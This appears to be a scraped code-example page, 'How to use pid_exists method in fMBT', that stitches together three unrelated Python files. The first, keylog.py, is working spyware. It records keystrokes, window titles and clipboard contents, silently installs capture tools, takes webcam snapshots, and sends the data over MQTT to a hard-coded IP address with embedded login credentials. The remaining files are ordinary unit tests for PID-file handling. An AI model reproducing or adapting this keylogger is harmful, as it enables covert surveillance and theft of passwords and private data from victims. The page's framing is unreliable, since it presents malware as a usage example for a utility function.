How to use pid_exists method in fMBT

Best Python code snippet using fMBT_python

keylog.py

Source:keylog.py Github

copy

Full Screen

...36 old_window = u'\nWindow : '+window+u'\n'37 write_log(old_window, mutex)38 except:39 pass40 if not pid_exists(parent_id):41 pid().kill()42 else:43 from win32gui import GetWindowText, GetForegroundWindow44 old_window = u''45 while True:46 sleep(0.8)47 try:48 if GetWindowText(GetForegroundWindow()) not in old_window:49 old_window = u'\nWindow : '+GetWindowText(GetForegroundWindow())+u'\n'50 write_log(old_window, mutex)51 except:52 pass53 if not pid_exists(parent_id):54 pid().kill()55def observe_clipboard(mutex, parent_id, procq):56 procq.put("clipboard " + str(pid().pid))57 if "Linux" in platform():58 from subprocess import STDOUT, check_call59 import os60 try:61 check_call(['apt-get', 'install', '-y', 'xclip'],62 stdout=open(os.devnull,'wb'), stderr=STDOUT) 63 except:64 pass65 from pyperclip import paste as clipboard66 clip = u''67 while True:68 sleep(2)69 try:70 if clipboard() not in clip:71 clip = u'\nClip : '+clipboard()+u'\n'72 write_log(clip, mutex)73 except:74 pass75 if not pid_exists(parent_id):76 pid().kill()77def text_checker_dump(mutex, parent_id, procq):78 from keyboard import on_press, on_release79 procq.put("keylog "+str(pid().pid))80 class tcd_global:81 prev_key = u''82 def mapper(key):83 if "shift" in key:84 if key in tcd_global.prev_key:85 tcd_global.prev_key = key86 return ''87 else:88 tcd_global.prev_key = key89 return "<shift>"90 elif "ctrl" in key:91 if key in tcd_global.prev_key:92 tcd_global.prev_key = key93 return ''94 else:95 tcd_global.prev_key = key96 return "<ctrl>"97 elif "backspace" in key:98 return "<backspace>"99 elif "space" in key:100 return " "101 elif "enter" in key:102 return "\n"103 elif "caps lock" in key:104 return "<CAPS>"105 elif "tab" in key:106 return "<tab>"107 elif "up" in key:108 return "<up>"109 elif "down" in key:110 return "<down>"111 elif "left" in key:112 return "<left>"113 elif "right" in key:114 return "<right>"115 else:116 return key117 def release_mapper(key):118 tcd_global.prev_key = ''119 if "shift" in key:120 return "</shift>"121 elif "ctrl" in key:122 return "</ctrl>"123 else:124 return ''125 def key_pressed(key_event):126 keyname = mapper(key_event.name)127 write_log(keyname, mutex)128 def key_released(key_event):129 keyname = release_mapper(key_event.name)130 write_log(keyname, mutex)131 on_press(key_pressed)132 on_release(key_released)133 while True:134 sleep(3)135 if not pid_exists(parent_id):136 pid().kill()137def send_to_server(mutex, parent_id, procq):138 import paho.mqtt.client as mqtt139 import paho.mqtt.publish as pub140 from getpass import getuser as User141 import socket142 from os import remove143 from glob import glob144 from base64 import b64encode145 procq.put("send_to_server " + str(pid().pid))146 def is_connected():147 try:148 host = socket.gethostbyname("www.google.com")149 socket.create_connection((host, 80), 2)150 return True151 except:152 pass153 return False154 while True:155 if not pid_exists(parent_id):156 pid().kill()157 if is_connected():158 file_content = u''159 mutex.acquire()160 try:161 with open("kl.log", "rb+") as f:162 file_content = f.read()163 except IOError:164 pass165 mutex.release()166 if file_content:167 pub.single('comp/'+User()+'/text', payload=file_content, qos=1, retain=False, hostname=hostname,168 port="1883", client_id="", keepalive=60, will=None,169 auth={'username': username, 'password': password}, tls=None,170 protocol=mqtt.MQTTv311)171 try:172 remove("kl.log")173 except:174 pass175 jpgs = glob("*.jpg")176 for jpg in jpgs:177 jpgdata = ''178 with open(jpg,'rb+') as f:179 jpgdata = b64encode(f.read())180 pub.single('comp/' + User() + '/webcam', payload=jpgdata, qos=1, retain=False,181 hostname="72.14.176.217",182 port="1883", client_id="", keepalive=60, will=None,183 auth={'username': "vspectrum", 'password': "Asakura4410"}, tls=None,184 protocol=mqtt.MQTTv311)185 remove(jpg)186 sleep(35)187def process_tracker(parent_id, processes_queue):188 sleep(10)189 process_dict = {}190 while True:191 if not pid_exists(parent_id):192 pid().kill()193 while not processes_queue.empty():194 ps = processes_queue.get().split(" ")195 process_dict[ps[0]] = ps[1]196 sleep(10)197def cam_capture(parent_id, procq):198 procq.put("webcam " + str(pid().pid))199 from os import stat, remove, devnull200 if "Linux" in platform():201 from subprocess import STDOUT, check_output, check_call202 try:203 check_call(['apt-get', 'install', '-y', 'fswebcam'],204 stdout=open(devnull,'wb'), stderr=STDOUT) 205 except:206 pass207 def get_snap():208 filename = str(datetime.now()).replace(':', '-')[:-7] + '.jpg'209 snapshot_cmd = "fswebcam -r 640x480 -S 5 -s brightness=65% --jpeg 90 '"+filename+"'"210 window = check_output(snapshot_cmd, shell=True)211 if stat(filename).st_size < 13000:212 remove(filename)213 sleep(30)214 while True:215 if not pid_exists(parent_id):216 pid().kill()217 get_snap()218 sleep(30)219 220 else:221 from VideoCapture import Device 222 def get_snap():223 filename = str(datetime.now()).replace(':', '-')[:-7] + '.jpg'224 cam = Device()225 cam.saveSnapshot(filename, quality=60, timestamp=1, textpos='br')226 del cam227 if stat(filename).st_size < 13000:228 remove(filename)229 sleep(30)230 while True:231 if not pid_exists(parent_id):232 pid().kill()233 get_snap()234 sleep(30)235if __name__ == '__main__':236 freeze_support()237 parent_pid = pid().pid238 mutex_for_file = Lock()239 input_dump = Process(target=text_checker_dump, args=(mutex_for_file, parent_pid, process_tracker_queue))240 input_dump.start()241 window_title = Process(target=observe_context, args=(mutex_for_file, parent_pid, process_tracker_queue))242 window_title.start()243 clipboard_data = Process(target=observe_clipboard, args=(mutex_for_file, parent_pid, process_tracker_queue))244 clipboard_data.start()245 phone_home = Process(target=send_to_server, args=(mutex_for_file, parent_pid, process_tracker_queue))...

Full Screen

Full Screen

test_multipidfile.py

Source:test_multipidfile.py Github

copy

Full Screen

1#! /usr/bin/python2# Copyright (C) 2013, 2016 Canonical Ltd.3# Author: Colin Watson <cjwatson@ubuntu.com>4# This program is free software: you can redistribute it and/or modify5# it under the terms of the GNU General Public License as published by6# the Free Software Foundation; version 3 of the License.7#8# This program is distributed in the hope that it will be useful,9# but WITHOUT ANY WARRANTY; without even the implied warranty of10# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the11# GNU General Public License for more details.12#13# You should have received a copy of the GNU General Public License14# along with this program. If not, see <http://www.gnu.org/licenses/>.15"""Unit tests for cdimage.multipidfile."""16from __future__ import print_function17import os18try:19 from unittest import mock20except ImportError:21 import mock22from cdimage.multipidfile import MultiPIDFile, MultiPIDFileError23from cdimage.tests.helpers import TestCase, mkfile24__metaclass__ = type25class TestMultiPIDFile(TestCase):26 def setUp(self):27 super(TestMultiPIDFile, self).setUp()28 self.use_temp_dir()29 self.multipidfile = MultiPIDFile(os.path.join(self.temp_dir, "pids"))30 def test_str(self):31 """A MultiPIDFile stringifies to 'multipidfile PATH'."""32 self.assertEqual(33 "multipidfile %s" % self.multipidfile.path, str(self.multipidfile))34 def test_context_manager(self):35 """A MultiPIDFile operates as a context manager, with locking."""36 self.assertFalse(os.path.exists(self.multipidfile.lock_path))37 with self.multipidfile:38 self.assertTrue(os.path.exists(self.multipidfile.lock_path))39 self.assertFalse(os.path.exists(self.multipidfile.lock_path))40 @mock.patch("subprocess.call", return_value=1)41 def test_lock_failure(self, mock_call):42 """__enter__ raises MultiPIDFileError if the lock is already held."""43 self.assertRaises(MultiPIDFileError, self.multipidfile.__enter__)44 def test_read_requires_lock(self):45 """_read must be called within the lock."""46 self.assertRaises(AssertionError, self.multipidfile._read)47 def test_read_missing(self):48 """A missing MultiPIDFile reads as empty."""49 with self.multipidfile:50 self.assertEqual(set(), self.multipidfile._read())51 @mock.patch("cdimage.osextras.pid_exists", return_value=True)52 def test_read_existing(self, mock_pid_exists):53 """An existing MultiPIDFile reads as the set of PIDs it contains."""54 with mkfile(self.multipidfile.path) as fd:55 print(1, file=fd)56 print(2, file=fd)57 with self.multipidfile:58 self.assertEqual(set([1, 2]), self.multipidfile._read())59 @mock.patch("cdimage.osextras.pid_exists")60 def test_read_skips_dead_pids(self, mock_pid_exists):61 """Only live PIDs are returned."""62 with mkfile(self.multipidfile.path) as fd:63 print(1, file=fd)64 print(2, file=fd)65 mock_pid_exists.side_effect = lambda pid: pid == 266 with self.multipidfile:67 self.assertEqual(set([2]), self.multipidfile._read())68 def test_write_requires_lock(self):69 """_write must be called within the lock."""70 self.assertRaises(AssertionError, self.multipidfile._write, 1)71 @mock.patch("cdimage.osextras.pid_exists", return_value=True)72 def test_write_missing(self, mock_pid_exists):73 """Writing to a missing MultiPIDFile works."""74 with self.multipidfile:75 self.multipidfile._write(set([1, 2]))76 self.assertEqual(set([1, 2]), self.multipidfile._read())77 @mock.patch("cdimage.osextras.pid_exists", return_value=True)78 def test_write_existing(self, mock_pid_exists):79 """Writing to an existing MultiPIDFile adjusts its contents."""80 with mkfile(self.multipidfile.path) as fd:81 print(1, file=fd)82 with self.multipidfile:83 self.multipidfile._write(set([1, 2]))84 self.assertEqual(set([1, 2]), self.multipidfile._read())85 def test_state(self):86 """The state can be fetched without explicit locking."""87 self.assertEqual(set(), self.multipidfile.state)88 @mock.patch("cdimage.osextras.pid_exists", return_value=True)89 def test_test_add(self, mock_pid_exists):90 self.assertFalse(self.multipidfile.test_add(1))91 self.assertEqual(set([1]), self.multipidfile.state)92 self.assertTrue(self.multipidfile.test_add(2))93 self.assertEqual(set([1, 2]), self.multipidfile.state)94 @mock.patch("cdimage.osextras.pid_exists", return_value=True)95 def test_test_add_error_on_existing_pid(self, mock_pid_exists):96 with mkfile(self.multipidfile.path) as fd:97 print(1, file=fd)98 self.assertRaises(MultiPIDFileError, self.multipidfile.test_add, 1)99 @mock.patch("cdimage.osextras.pid_exists", return_value=True)100 def test_remove_test(self, mock_pid_exists):101 with mkfile(self.multipidfile.path) as fd:102 print(1, file=fd)103 print(2, file=fd)104 self.assertTrue(self.multipidfile.remove_test(2))105 self.assertEqual(set([1]), self.multipidfile.state)106 self.assertFalse(self.multipidfile.remove_test(1))107 self.assertEqual(set(), self.multipidfile.state)108 def test_remove_test_error_on_empty(self):109 """remove_test raises MultiPIDFileError if already empty."""110 self.assertRaises(MultiPIDFileError, self.multipidfile.remove_test, 1)111 @mock.patch("cdimage.osextras.pid_exists", return_value=True)112 def test_remove_test_error_on_missing_pid(self, mock_pid_exists):113 with mkfile(self.multipidfile.path) as fd:114 print(1, file=fd)115 self.assertRaises(MultiPIDFileError, self.multipidfile.remove_test, 2)116 @mock.patch("cdimage.osextras.pid_exists", return_value=True)117 def test_round_trip(self, mock_pid_exists):118 """After a +/- round-trip, the MultiPIDFile path is missing."""119 self.assertFalse(self.multipidfile.test_add(1))120 self.assertFalse(self.multipidfile.remove_test(1))121 self.assertFalse(os.path.exists(self.multipidfile.path))122 @mock.patch("cdimage.osextras.pid_exists", return_value=True)123 def test_held(self, mock_pid_exists):124 self.assertEqual(set(), self.multipidfile.state)125 with self.multipidfile.held(1) as state_zero:126 self.assertFalse(state_zero)127 self.assertEqual(set([1]), self.multipidfile.state)128 with self.multipidfile.held(2) as state_one:129 self.assertTrue(state_one)130 self.assertEqual(set([1, 2]), self.multipidfile.state)131 self.assertEqual(set([1]), self.multipidfile.state)...

Full Screen

Full Screen

test_utils_process.py

Source:test_utils_process.py Github

copy

Full Screen

...5from utils.process import pid_exists6class UtilsProcessTest(unittest.TestCase):7 def test_my_own_pid(self):8 my_pid = os.getpid()9 self.assertTrue(pid_exists(my_pid))10 def test_inexistant_pid(self):11 # There will be one point where we finally find a free PID12 for pid in xrange(30000):13 if not pid_exists(pid):14 return...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run fMBT automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful